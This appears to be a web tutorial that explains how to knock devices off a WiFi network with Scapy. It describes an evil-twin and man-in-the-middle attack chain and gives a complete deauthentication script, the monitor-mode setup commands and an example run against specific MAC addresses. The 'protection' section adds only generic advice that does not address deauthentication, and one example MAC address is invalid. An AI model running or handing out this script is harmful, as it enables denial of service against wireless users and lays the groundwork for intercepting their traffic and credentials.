How to disconnect devices from WiFi using Scapy
Scapy is a powerful Python-based packet manipulation tool that can be used for network analysis and packet sniffing.
While it can be used for legitimate purposes, it can also be used by hackers to launch attacks on wireless networks, including the disconnection of devices from WiFi.
Disrupting WiFi with Scapy
Here is an example of how a hacker could potentially use Scapy to disconnect devices from a WiFi network:
The hacker sets up a wireless access point with the identical SSID as the target network. This is known as an evil twin attack.
The hacker uses Scapy to capture the MAC addresses of all devices connected to the target network.
The hacker then sends de-authentication packets using Scapy, spoofing the source MAC address to that of the access point. This makes it appear that the de-authentication packets are coming from a legitimate WiFi access point.
The de-authentication packets are sent to each of the devices whose MAC addresses were captured in step 2, causing them to disconnect from the target network.
The hacker can then launch a man-in-the-middle (MitM) attack, intercepting the traffic of the disconnected devices and potentially stealing sensitive information.
Code example
To disconnect a device from the WIFI using Scapy, we will need need a Linux machine that is connected to the WIFI network and craft a code as the one shown below in a file named scapy.py:
from scapy.all import *def deauth(target_mac, gateway_mac, inter=0.1, count=None, loop=1, iface="wlan0mon", verbose=1):# 802.11 frame# addr1: destination MAC# addr2: source MAC# addr3: Access Point MACdot11 = Dot11(addr1=target_mac, addr2=gateway_mac, addr3=gateway_mac)# stack them uppacket = RadioTap()/dot11/Dot11Deauth(reason=7)# send the packetsendp(packet, inter=inter, count=count, loop=loop, iface=iface, verbose=verbose)if __name__ == "__main__":import argparseparser = argparse.ArgumentParser(description="A python script for sending deauthentication frames")parser.add_argument("target", help="Target MAC address to deauthenticate.")parser.add_argument("gateway", help="Gateway MAC address that target is authenticated with")parser.add_argument("-c" , "--count", help="number of deauthentication frames to send, specify 0 to keep sending infinitely, default is 0", default=0)parser.add_argument("--interval", help="The sending frequency between two frames sent, default is 100ms", default=0.1)parser.add_argument("-i", dest="iface", help="Interface to use, must be in monitor mode, default is 'wlan0mon'", default="wlan0mon")parser.add_argument("-v", "--verbose", help="wether to print messages", action="store_true")args = parser.parse_args()target = args.targetgateway = args.gatewaycount = int(args.count)interval = float(args.interval)iface = args.ifaceverbose = args.verboseif count == 0:# if count is 0, it means we loop forever (until interrupt)loop = 1count = Noneelse:loop = 0# printing some info messages"if verbose:if count:print(f"[+] Sending {count} frames every {interval}s...")else:print(f"[+] Sending frames every {interval}s for ever...")deauth(target, gateway, interval, count, loop, iface, verbose)
We can then run the code after making the Linux machine to be in monitor mode using the sudo ifconfig wlan0 down command followed by the sudo iwconfig wlan0 mode monitor command. So if we want to de-authenticate a user whose target mac address is 00:ak:fa:71:e2:5e and the access point for the target is e8:79:f6:c4:98:3f, we can do this through the Linux terminal using python3 scapy.py 00:ak:fa:71:e2:5e e8:76:f6:c4:98:3f -i wlan0mon -v.
Protecting against Scapy-based WiFi attacks
A hacker may want to disconnect devices from WiFi using Scapy for various reasons, such as:
Conducting a man-in-the-middle attack: By disconnecting a victim's device from the WiFi network, a scammer can force them to connect to a malicious network controlled by the attacker. This allows the scammer to intercept and alter the victim's network traffic, stealing sensitive information such as login credentials or personal data.
Performing a denial-of-Service attack: Scammers may use Scapy to send de-authentication packets to a victim's device, which will force the device to disconnect from the WiFi network. This can be used to prevent the victim from accessing the network, causing inconvenience or even financial losses.
Conclusion
The main goal of a scammer using Scapy to disconnect devices from WiFi is to gain unauthorized access to the network or disrupt its normal operation for personal gain. It is important to be aware of these types of attacks and take appropriate measures to protect against them, such as using strong passwords, enabling two-factor authentication, and keeping software up-to-date.
It's important to note that performing such an attack is illegal and unethical. Additionally, network administrators need to implement strong security measures, such as implementing encryption and authentication protocols, monitoring the network for suspicious activity, and maintaining a secure and up-to-date network infrastructure.
